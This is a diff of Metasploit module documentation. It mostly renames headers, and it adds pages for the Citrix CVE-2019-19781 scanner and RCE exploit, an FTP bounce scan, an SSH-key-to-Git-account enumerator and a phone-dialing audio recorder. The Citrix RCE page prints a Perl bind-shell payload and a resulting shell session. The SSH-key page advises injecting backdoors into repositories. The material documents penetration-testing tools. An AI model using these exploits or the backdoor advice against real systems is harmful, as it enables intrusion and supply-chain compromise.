+## Vulnerable Application

 This module allows you to authenticate to Advantech WebAccess.

-## Vulnerable Application
-
 This module was specifically tested on versions 8.0, 8.1, and 8.2:

 **8.2 Download**
@@ -23,7 +21,6 @@ Note:
 By default, Advantech WebAccess comes with a built-in account named ```admin```, with a blank
 password.

-
 ## Verification Steps

 1. Make sure Advantech WebAccess is up and running
@@ -34,6 +31,6 @@ password.
 6. ```run```
 7. You should see that the module is attempting to log in.

-## Demo
+## Scenarios

 ![webaccess_login_demo](https://cloud.githubusercontent.com/assets/1170914/22352301/26549236-e3e1-11e6-9710-506166a8bee3.gif)
@@ -1,10 +1,9 @@
+## Vulnerable Application
+
 This module exploits a vulnerability found in Cisco Firepower Management console. A logged in
 user can abuse the report viewing feature to download an arbitrary file. Authentication is
 required to exploit this vulnerability.

-
-## Vulnerable Application
-
 This module was written specifically against Cisco Firepower Management 6.0.1 (build 1213) during
 development. To test, you may download the virtual appliance here:

@@ -26,6 +25,6 @@ admin:Admin123 by default:
 If the file is found, it will be saved in the loot directory. If not found, the module should
 print an error indicating so.

-## Demo
+## Scenarios

 ![cisco_download_demo](https://cloud.githubusercontent.com/assets/1170914/21782825/78ada38e-d67a-11e6-9b7b-c7b8e2956fba.gif)
@@ -0,0 +1,57 @@
+## Introduction
+
+An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. The vulnerability, tracked as CVE-2019-19781, allows for directory traversal. If exploited, it could allow an unauthenticated attacker to perform arbitrary code execution.
+
+Because vulnerable servers allow for directory traversal, they will accept the request `GET /vpn/../vpns/` and process it as a request for `GET /vpns/`, a directory that contains PERL scripts that can be targeted to allow for limited file writing on the vulnerable host.
+
+This module checks if a target server is vulnerable by issuing an HTTP GET request for `/vpn/../vpns/cfg/smb.conf`and then checking the response for `[global]` since this configuration file should contain global variables. If `[global]` is found, the server is vulnerable to CVE-2019-19781.
+
+## Verification Steps
+
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/citrix_dir_traversal`
+4. Do: `set RHOSTS [IP]`
+5. Do: `run`
+
+## Options
+
+1. `Proxies`. This option is not set by default.
+2. `RPORT`. The default setting is `80`. To use: `set RPORT [PORT]`
+3. `SSL`. The default setting is `false`.
+4. `THREADS`. The default setting is `1`.
+5. `VHOST`. This option is not set by default.
+6. `TARGETURI`. This option is the base path. `/` by default.
+7. `PATH`. This option is the traversal path. `/vpn/../vpns/cfg/smb.conf` by default.
+
+## Scenarios
+
+```
+msf5 auxiliary(scanner/http/citrix_dir_traversal) > options
+
+Module options (auxiliary/scanner/http/citrix_dir_traversal):
+
+   Name       Current Setting            Required  Description
+   ----       ---------------            --------  -----------
+   PATH       /vpn/../vpns/cfg/smb.conf  yes       Traversal path
+   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1                  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8080                       yes       The target port (TCP)
+   SSL        false                      no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                          yes       Base path
+   THREADS    1                          yes       The number of concurrent threads (max one per host)
+   VHOST                                 no        HTTP server virtual host
+
+msf5 auxiliary(scanner/http/citrix_dir_traversal) > run
+
+[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
+[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/citrix_dir_traversal) >
+```
+
+## References
+
+1. <https://nvd.nist.gov/vuln/detail/CVE-2019-19781>
+2. <https://support.citrix.com/article/CTX267027>
@@ -9,7 +9,7 @@ The device has at least two (2) users - admin and user. Due to an access control
 3. Do: ```set RPORT [PORT]```
 4. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/http/cnpilot_r_web_login_loot
@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 This module scans one or more web servers for interesting directories that can be further explored.

@@ -9,7 +9,7 @@ Related links :
 * https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
 * http://download.oracle.com/glassfish/4.1/release/glassfish-4.1.zip - Download Oracle Glass Fish 4.1

-## Verification
+## Verification Steps

  1. Start msfconsole
  2. Do: ```use auxiliary/scanner/http/glassfish_traversal```
@@ -11,7 +11,7 @@ This module can abuse misconfigured web servers to upload and delete web content
 6. Do: ```set FILEDATA [PATH]```
 7. Do: ```run```

-## Options 
+## Options

 ### ACTION

@@ -1,13 +1,15 @@
-
-## Microsoft IIS shortname vulnerability scanner
-
-The vulnerability is caused by a tilde character `~` in a GET or OPTIONS request, which could allow remote attackers to disclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request) This was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
-
 ## Vulnerable Application

-Older Microsoft IIS installations are vulnerable with GET, newer installations with OPTIONS
-  
-  
+The vulnerability is caused by a tilde character `~` in a GET or OPTIONS request, which could allow remote attackers
+to disclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request)
+this was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
+
+Older Microsoft IIS installations are vulnerable with GET, newer installations with OPTIONS 
+
+### Remediation
+
+Create registry key `NtfsDisable8dot3NameCreation` at `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem`, with a value of `1`
+
 ## Verification Steps

  1. Install IIS (default installations are vulnerable)
@@ -51,13 +53,3 @@ Older Microsoft IIS installations are vulnerable with GET, newer installations w
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host
 ```
-
-## Remediation
-
-Create registry key `NtfsDisable8dot3NameCreation` at `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem`, with a value of `1`
-
-
-## References
-
-  * https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/
-  * https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability
@@ -12,7 +12,7 @@
  * [RIPS v0.54 Source](https://sourceforge.net/projects/rips-scanner/files/rips-0.54.zip/download)


-## Verification
+## Verification Steps

  1. Start `msfconsole`
  2. `use auxiliary/scanner/http/rips_traversal`
@@ -1,13 +1,11 @@
-## Description
+## Vulnerable Application

 This module exploits an unauthenticated directory traversal vulnerability, which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6.
 Spring Cloud Config listens by default on port 8888.

-### Vulnerable Application
-
 * https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip

-## Verification
+## Verification Steps

 1. `./msfconsole`
 2. `use auxiliary/scanner/http/springcloud_traversal`
@@ -29,7 +27,3 @@ msf auxiliary(scanner/http/springcloud_traversal) > run
 [*] Auxiliary module execution completed
 msf auxiliary(scanner/http/springcloud_traversal) >
 ```
-
-## References
-
-* https://pivotal.io/security/cve-2019-3799
@@ -34,11 +34,15 @@ Affecting total.js package, versions:

 ## Options

-* **TARGETURI**: Path to Total.js App installation (“/” is the default)
-* **DEPTH**: Traversal depth (“1” is the default)
-* **FILE**: File to obtain (“databases/settings.json” is the default for Total.js CMS App)
+ **DEPTH**

-## Scenario
+  Traversal depth. Default is `1`
+
+ **FILE**
+
+  File to obtain. Default is `databases/settings.json`
+
+## Scenarios

 ### Tested on Total.js framework 3.2.0 and Total.js CMS 12.0.0

@@ -0,0 +1,34 @@
+## Description
+
+This module exploits an unauthenticated directory traversal vulnerability which exists in TVT network surveillance management software-1000 version 3.4.1. NVMS listens by default on port 80.
+
+### Vulnerable Application
+
+* http://en.tvt.net.cn/upload/service/NVMS1000.zip
+
+## Verification
+
+1. `./msfconsole`
+2. `use auxiliary/scanner/http/tvt_nvms_traversal`
+3. `set rhosts <rhost>`
+4. `run`
+
+## Scenarios
+
+### Tested against Windows 7 SP1
+
+```
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS 192.168.43.152
+RHOSTS => 192.168.43.152
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) > run
+
+[+] File saved in: /root/.msf4/loot/20191230124941_default_192.168.43.152_nvms.traversal_240600.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) >
+```
+
+## References
+
+* https://www.exploit-db.com/exploits/47774
+* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20085
@@ -1,15 +1,11 @@
-## Description
+## Vulnerable Application
+
  This module attempts to authenticate against a Wordpress-site (via 
  XMLRPC) using username and password combinations indicated by the 
  `USER_FILE`, `PASS_FILE`, and `USERPASS_FILE` options.

-## References
-* [https://codex.wordpress.org/XML-RPC_Support](https://codex.wordpress.org/XML-RPC_Support)
-* [http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/](http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/)
-
-## Vulnerable Application
-
 ### Setup using Docksal
+
 Install [Docksal](https://docksal.io/)

 Create a new WordPress installation using `fin project create`
@@ -4,7 +4,7 @@ Exchange installations to enumerate email.

 Error-based user enumeration for Office 365 integrated email addresses

-## Verification
+## Verification Steps

 - Start `msfconsole`
 - `use auxiliary/scanner/msmail/exchange_enum`
@@ -11,7 +11,7 @@ OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.

 **Note:**  Currently uses RHOSTS which resolves to an IP which is NOT desired, this is currently being fixed 

-## Verification
+## Verification Steps

 - Start `msfconsole`
 - `use auxiliary/scanner/msmail/host_id`
@@ -6,7 +6,7 @@ OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.

 **Note:**  Currently uses RHOSTS which resolves to an IP which is NOT desired, this is currently being fixed 

-## Verification
+## Verification Steps

 - Start `msfconsole`
 - `use auxiliary/scanner/msmail/onprem_enum`
@@ -0,0 +1,67 @@
+## Vulnerable Application
+
+Enumerate TCP services via the FTP bounce PORT/LIST method
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use modules/auxiliary/scanner/portscan/ftpbounce`
+3. Do: `set BOUNCEHOST [ip]`
+4. Do: `set PORTS [number(s)]`
+5. Do: `set RHOSTS [ip]`
+6. Do: `set FTPUSER [user]`
+7. Do: `set FTPPASS [password]`
+8. Do: `run`
+
+## Scenarios
+
+Docker Usage:  `docker run -e "ADDED_FLAGS=-w -W -d -d" -e FTP_USER_NAME=bob -e FTP_USER_PASS=12345 -e FTP_USER_HOME=/home/bob stilliard/pure-ftpd`
+
+### PureFTPd and Kali Linux 2019.3
+
+  ```
+  msf > use modules/auxiliary/scanner/portscan/ftpbounce
+  msf auxiliary(scanner/portscan/ftpbounce) > set BOUNCEHOST 172.17.0.2
+    BOUNCEHOST => 172.17.0.2
+  msf auxiliary(scanner/portscan/ftpbounce) > set PORTS 8080
+    BOUNCEPORT => 8080
+  msf auxiliary(scanner/portscan/ftpbounce) > set RHOSTS 172.17.0.4
+    RHOSTS => 172.17.0.4
+  msf auxiliary(scanner/portscan/ftpbounce) > set FTPUSER bob
+    FTPUSER => bob
+  msf auxiliary(scanner/portscan/ftpbounce) > set FTPPASS 12345
+    FTPPASS => 12345
+  msf auxiliary(scanner/portscan/ftpbounce) > run
+
+    [+] 172.17.0.2:21 -  TCP OPEN 172.17.0.4:8080
+    [*] 172.17.0.2:21 - Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
+
+#### Manual Exploitation
+
+  ```
+  root@ubuntu:~# nmap -p 8080 -v -b bob:12345@172.17.0.2 172.17.0.4 -Pn
+
+    Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-25 20:34 UTC
+    Resolved FTP bounce attack proxy to 172.17.0.2 (172.17.0.2).
+    Initiating Parallel DNS resolution of 1 host. at 20:34
+    Completed Parallel DNS resolution of 1 host. at 20:34, 0.00s elapsed
+    Attempting connection to ftp://bob:12345@172.17.0.2:21
+    Connected:220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
+    220-You are user number 1 of 5 allowed.
+    220-Local time is now 20:34. Server port: 21.
+    220-This is a private system - No anonymous login
+    220-This server supports FXP transfers
+    220-IPv6 connections are also welcome on this server.
+    220 You will be disconnected after 15 minutes of inactivity.
+    Login credentials accepted by FTP server!
+    Initiating Bounce Scan at 20:34
+    Discovered open port 8080/tcp on 172.17.0.4
+    Completed Bounce Scan at 20:34, 0.00s elapsed (1 total ports)
+    Nmap scan report for 172.17.0.4
+    Host is up.
+
+    PORT     STATE SERVICE
+    8080/tcp open  http-proxy
+  ```
@@ -13,7 +13,7 @@ Detects a closed port via a RST received in response to the FIN
  XMAS scan requires the use of raw sockets, and thus cannot be performed from some Windows
  systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.

-# Options
+## Options

  **PORTS**
  
@@ -34,7 +34,7 @@ Detects a closed port via a RST received in response to the FIN
  Gives detailed message about the scan of all the ports. It also shows the
  ports that were not open/filtered.

-# Verification Steps
+## Verification Steps

  1. Do: `use auxiliary/scanner/portscan/xmas`
  2. Do: `set RHOSTS [IP]`
@@ -42,7 +42,7 @@ Detects a closed port via a RST received in response to the FIN
  4. Do: `run`
  5. The open/filtered ports will be discovered, status will be printed indicating as such.

-# Scenarios
+## Scenarios
  
 ### Metaspliotable 2

@@ -57,7 +57,7 @@ IP, Subnetmask and Gateway are: 172.16.30.102, 255.255.0.0, 172.16.0.1
 [*] Auxiliary module execution completed
 ```

-## Module Options
+## Options
 ```
 msf auxiliary(profinet_siemens) > show options

@@ -31,7 +31,7 @@ Currently supported objects are:
  module user to view the output but also causes it to be written to disk before
  it is retrieved and deleted.

-## Scenario
+## Scenarios

 ```
 metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/dcomexec) > show options 
@@ -9,7 +9,7 @@
 1. Set: `RHOSTS`, `SMBUser`, `SMBPass`
 1. Do: `run`, see hashes from the remote machine

-## Scenario
+## Scenarios

 ```
 metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/secretsdump) > show options 
@@ -18,7 +18,7 @@
  module user to view the output but also causes it to be written to disk before
  it is retrieved and deleted.

-## Scenario
+## Scenarios

 ```
 metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/wmiexec) > show options 
@@ -7,7 +7,7 @@ Cambium cnPilot r200/r201 devices can be administered using SNMP. The device con
 3. Do: ```set COMMUNITY public```
 4. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/snmp/cnpilot_r_snmp_loot
@@ -11,7 +11,7 @@ Note: If the backup url is not retrieved, it is recommended to increase the TIME
 3. Do: ```set COMMUNTY [SNMP_COMMUNUTY_STRING]```
 4. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/snmp/epmp_snmp_loot
@@ -0,0 +1,59 @@
+## Introduction
+
+This module attempts to authenticate to Git servers using compromised SSH private keys. This module can be used to check a single key or recursively look through a directory. It will not attempt to check keys that have a passphrase, however a bruteforce attack could be launched on a key and then the passphrase could be disabled.
+
+## Setup
+
+1. `ssh-keygen -b 2048 -t rsa`
+2. Add the RSA pubic key to a GitHub or GitLab account (Public ends in .pub)
+3. Follow the usage instructions below
+4. Either use KEY_FILE or KEY_DIR to specify the generated SSH private key
+5. Run the module
+6. Observe that it will identify the GitHub/GitLab user that this key belongs to
+
+## Usage
+
+```
+msf5 > use auxiliary/scanner/ssh/ssh_enum_git_keys
+msf5 auxiliary(scanner/ssh/ssh_enum_git_keys) > set KEY_DIR /Users/w/.ssh
+KEY_DIR => /Users/w/.ssh
+msf5 auxiliary(scanner/ssh/ssh_enum_git_keys) > run
+
+Git Access Data
+===============
+
+Key Location              User Access
+------------              -----------
+/Users/w/.ssh/id_ed25519  wdahlenburg
+
+[*] Auxiliary module execution completed
+```
+## Post Exploitation
+
+Once you have identified a Git user from an SSH key, there are two immediate possibilities.
+
+1. Download private repositories that the owner knows
+2. Modify public repositories and inject a backdoor
+
+To begin either, the valid keys will need to be added to the current `~/.ssh/config`.
+
+Example: Using a valid key at /Users/w/.ssh/id_ed25519
+
+1. Write the following to `~/.ssh/config`
+`Host github
+    User git
+    Hostname github.com
+    PreferredAuthentications publickey
+    IdentityFile /Users/w/.ssh/id_ed25519
+    `
+2. Clone a repo using the key
+` $ git clone github:<username>/Repo.git`
+3. Alternatively, modify an existing local repo by modifying the .git/config file
+```
+...
+[remote "origin"]
+    url = github:username/reponame.git
+...
+
+```
+4. Any changes will be pushed using the specified key. Make sure you set the git aliases to match your target.
@@ -1,6 +1,6 @@
 Some TLS implementations handle errors processing RSA key exchanges and encryption (PKCS #1 v1.5 messages) in a broken way that leads an adaptive chosen-chiphertext attack. Attackers cannot recover a server's private key, but they can decrypt and sign messages with it. A strong oracle occurs when the TLS server does not strictly check message formatting and needs less than a million requests on average to decode a given ciphertext. A weak oracle server strictly checks message formatting and often requires many more requests to perform the attack.

-## Vulnerable Applications
+## Vulnerable Application

 * F5 BIG-IP 11.6.0-11.6.2 (fixed in 11.6.2 HF1), 12.0.0-12.1.2 HF1 (fixed in 12.1.2 HF2), or 13.0.0-13.0.0 HF2 (fixed in 13.0.0 HF3) (CVE 2017-6168)
 * Citrix NetScaler Gateway 10.5 before build 67.13, 11.0 before build 71.22, 11.1 before build 56.19, and 12.0 before build 53.22 (CVE 2017-17382)
@@ -12,7 +12,7 @@ The following versions of SenNet Data Logger and Electricity Meters, monitoring
 3. Do: ```set RPORT [PORT]```
 4. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/telnet/satel_cmd_exec
@@ -0,0 +1,38 @@
+## Vulnerable Application
+
+This module dials a range of phone numbers and records audio from each answered call.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use modules/auxiliary/scanner/voice/recorder`
+3. Do: `set IAX_HOST [ip]`
+4. Do: `set OUTPUT_PATH [path]`
+5. Do: `set TARGETS [phone numbers]`
+6. Do: `run`
+
+## Scenarios
+
+ ```
+  msf > use modules/auxiliary/scanner/voice/recorder
+  msf auxiliary(scanner/voice/recorder) > set IAX_HOST 10.0.183.93
+    IAX_HOST => 10.0.183.93
+  msf auxiliary(scanner/voice/recorder) > set OUTPUT_PATH /root/audio
+    OUTPUT_PATH => /root/voice
+  msf auxiliary(scanner/voice/recorder) > set TARGETS 123-456-7890
+    TARGETS => 123-456-7890
+  msf auxiliary(scanner/voice/recorder) > run
+    [*] Dialing 123-456-7890...
+    [*]   Number: 123-456-7890 ringing  Frames 0 DTMF ''
+    [*]   Number: 123-456-7890 ringing  Frames 0 DTMF ''
+    [*]   Number: 123-456-7890 ringing  Frames 0 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 51 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 101 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 151 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 201 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 252 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 302 DTMF ''
+    [*]   Completed   Number: 123-456-7890  State: hangup Frames: 302 DTMF ''
+    [+] 123-456-7890 resulted in 15420 bytes of audio to /root/audio/123-456-7890.raw
+    [*] Auxiliary module execution completed
+  ```
@@ -1,7 +1,7 @@
 Browser Autopwn 2 is a complete redesign from the first one, so quite a few things will look and
 feel different for you. Here are the features you should know about before using.

-## Vulnerable Applications
+## Vulnerable Application

 Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins, such as:

@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application

 This module exploits a SQLi vulnerability found in
 OpenEMR version 5.0.1 Patch 6 and lower. The
@@ -10,18 +10,6 @@ This module saves each table as a `.csv` file in your
 loot directory and has been tested with
 OpenEMR 5.0.1 (3).

-
-## Author
-
-Will Porter (will.porter@lodestonesecurity.com) from Lodestone Security
-
-
-## References
-
-https://www.cvedetails.com/cve/CVE-2018-17179/
-https://github.com/openemr/openemr/commit/3e22d11c7175c1ebbf3d862545ce6fee18f70617
-
-
 ## Options

 ```
@@ -39,7 +27,7 @@ Module options (auxiliary/sqli/openemr/openemr_sqli_dump):
   VHOST                       no        HTTP server virtual host
 ```

-## Usage
+## Scenarios

 This module has both `check` and `run` functions.

@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 This module uses the su binary present on rooted devices to run a payload as root.

@@ -8,12 +8,10 @@ temporary directory, make it executable, execute it in the background, and final

 On most devices the su binary will pop-up a prompt on the device asking the user for permission.

-## Vulnerable Application
-
 This module will only work on *rooted* devices. An off the shelf Android device is unlikely to be rooted, however it's possible to root a device without losing the data.
 Many devices can be rooted by flashing new firmware, however the existing data will be lost.

-## Verfication steps
+## Scenarios

 You'll first need to obtain a session on the target device. To do this follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md)

@@ -35,7 +35,7 @@ Change dictory to CVE-2017-1263X, and run `docker-compose up -d`
  9. Do: ``exploit``
  10. You should get a shell.

-## Options   
+## Options

 - URIPATH

@@ -40,28 +40,34 @@ https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-2
 ## Options

 **RHOSTS**
+
 Configure the remote vulnerable system.

 **RPORT**
+
 Configure the TCP port of the HTTP/HTTPS management web interface.

 **USE_SSL**
+
 This flag controls whether the remote management web interface is accessible
 via HTTPS or not. Should be false for HTTP and true for HTTPS.

 **PAYLOAD**
+
 Configure the Metasploit payload that you want to stage. Must be for MIPS64
 arch.  Set payload Options accordingly.

 **SRVHOST**
+
 The module stages the payload via a web server. This is the binding interface
 IP. Default can be set to 0.0.0.0. 

 **HTTPDelay**
+
 This configures how long the module should wait for the incoming HTTP
 connection to the HTTP stager.

-## Verification Steps:
+## Verification Steps

 1. Have exploitable RV320 or RV325 router (exampe IP: 192.168.1.1):
 2. Start `msfconsole`:
@@ -74,7 +80,7 @@ connection to the HTTP stager.
 9. Gives you a privileged (uid=0) shell or in the example a meterpreter session.


-## Scenario
+## Scenarios

 Exploiting a vulnerable RV320 router with publicly accessible HTTPS web
 interface on TCP port 443: 
@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application

 The Cisco UCS Director virtual appliance contains two flaws that can be combined
 and abused by an attacker to achieve remote code execution as root.
@@ -16,21 +16,7 @@ Note that Cisco also mentions in their advisory that their IMC Supervisor and
 UCS Director Express are also affected by these vulnerabilities, but this module
 was not tested with those products.

-
-## Author and discoverer
-
-Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
-
-
-## References
-
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-authby
-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-cmdinj
-FULL_DISC
-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt
-
-
-## Usage
+## Scenarios

 Setup RHOST, LHOST, LPORT and run it!

@@ -0,0 +1,76 @@
+## Introduction
+
+A directory traversal was discovered in Citrix Application Delivery Controller (ADC), aka NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0.
+
+When the NSPPE receives a request for `GET /vpn/index.html`, it is supposed to send this request to Apache, which processes it. However, by making the request `GET /vpn/../vpns/` (which is not sanitized), Apache transforms the route into `GET /vpns/` and processes this last request normally.
+
+This `/vpns/` directory is interesting because it contains Perl code. The script `newbm.pl` creates an array containing information from several parameters, then calls the `filewrite` function, which writes the content to an XML file on disk.
+
+A malicious attacker can execute arbitrary commands remotely by creating a corrupted XML file that uses the Perl Template Toolkit in part of payload.
+
+```
+msf5 exploit(linux/http/citrix_dir_traversal_rce) > run
+
+[*] Using auxiliary/scanner/http/citrix_dir_traversal as check
+[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
+[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
+[*] Scanned 1 of 1 hosts (100% complete)
+[+] The target appears to be vulnerable
+[*] Yeeting cmd/unix/generic payload at 127.0.0.1:8080
+[*] Generated payload: id
+uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
+
+[!] This exploit may require manual cleanup of '/netscaler/portal/templates/mdjLHiHtIYmh.xml' on the target
+[!] This exploit may require manual cleanup of '/var/tmp/netscaler/portal/templates/mdjLHiHtIYmh.xml.ttc2' on the target
+[*] Exploit completed, but no session was created.
+msf5 exploit(linux/http/citrix_dir_traversal_rce) > set payload cmd/unix/bind_perl
+payload => cmd/unix/bind_perl
+msf5 exploit(linux/http/citrix_dir_traversal_rce) > run
+
+[*] Using auxiliary/scanner/http/citrix_dir_traversal as check
+[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
+[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
+[*] Scanned 1 of 1 hosts (100% complete)
+[+] The target appears to be vulnerable
+[*] Yeeting cmd/unix/bind_perl payload at 127.0.0.1:8080
+[*] Generated payload: perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'
+[!] No response to GET KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml request
+[*] Started bind TCP handler against 127.0.0.1:4444
+[*] Command shell session 1 opened (127.0.0.1:51106 -> 127.0.0.1:4444) at 2020-01-13 20:50:45 -0600
+[+] Deleted /netscaler/portal/templates/KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml
+[+] Deleted /var/tmp/netscaler/portal/templates/KdlZHSNjZQzdSCKAusgAnnbPvTMLhXRxiEydEotJP.xml.ttc2
+
+id
+uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
+```
+
+## Verification Steps
+
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/linux/http/citrix_dir_traversal_rce`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set LHOST [IP]`
+6. Do: `set VERBOSE true`
+7. Do: `run`
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   Python
+1   Unix Command
+```
+
+## Advanced options
+
+**ForceExploit**
+
+Override check result.
+
+## References
+
+1. <https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>
+2. <https://www.exploit-db.com/exploits/47901>
+3. <https://www.exploit-db.com/exploits/47902>
@@ -1,4 +1,4 @@
-# Vulnerable Application
+## Vulnerable Application
 Utilizing the DCOS Cluster's Marathon UI, an attacker can create
 a docker container with the '/' path mounted with read/write
 permissions on the host server that is running the docker container.
@@ -155,7 +155,7 @@ in the DCOS cluster.
 - [ ] Verify it creates a docker container and it successfully runs
 - [ ] After a minute a session should be opened from the agent server

-## Example Output
+## Scenarios
 ```
 msf > use exploit/linux/http/dcos_marathon
 msf exploit(dcos_marathon) > set RHOST 192.168.0.9
@@ -1,4 +1,4 @@
-# Vulnerable Application
+## Vulnerable Application
 Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp
 with tls but without tls-auth), an attacker can create a Docker
 container with the '/' path mounted with read/write permissions on the
@@ -85,7 +85,7 @@ to gain root access to the hosting server of the Docker container.
 - [ ] Verify it creates a Docker container and it successfully runs
 - [ ] After a minute a session should be opened from the Docker server

-## Example Output
+## Scenarios
 ```
 msf > use exploit/linux/http/docker_daemon_tcp
 msf exploit(docker_daemon_tcp) > set RHOST 192.168.66.23
@@ -10,7 +10,7 @@ Note: `cmd/unix/reverse_netcat` is the only payload that seems to work and is st
 4. Do: ```set LHOST [IP]```
 5. Do: ```exploit -j```

-## Sample Output
+## Scenarios

  ```
 msf > use use exploit/unix/http/epmp1000_get_chart_cmd_shell
@@ -12,7 +12,7 @@ Note: `cmd/unix/reverse_netcat` is the only payload that seems to work and is st
 4. Do: ```set LHOST [IP]```
 5. Do: ```exploit -j```

-## Sample Output
+## Scenarios

  ```
 msf > use use exploit/unix/http/epmp1000_ping_cmd_shell
@@ -9,7 +9,7 @@ Refer to: https://www.exploit-db.com/exploits/36807/

 NOTE: GoAutoDial heavily restricts inbound traffic via iptables rules (and uses fail2ban, as well).  This can cause bind payloads to quietly fail.  For bind payloads, using ports which allow inbound connections but have no service running is ideal (ports 21 and 222 fall into this category for default GoAutoDial behavior).

-## Verification
+## Verification Steps

 - Start `msfconsole`
 - Do `use exploit/linux/http/goautodial_3_rce_command_injection`
@@ -1,4 +1,4 @@
-# Vulnerable Application
+## Vulnerable Application

 Nagios XI 5.5.6 Root Remote Code Execution

@@ -14,7 +14,7 @@ The exploit works as follows:
 - Download Nagios XI 5.5.6 from the official website (https://www.nagios.com/downloads/nagios-xi/older-releases/).
 - Follow the official instructions to install it on your Ubuntu VM (https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf).

-# Verification Steps
+## Verification Steps

 1. `use exploit/linux/http/nagios_xi_root_rce`
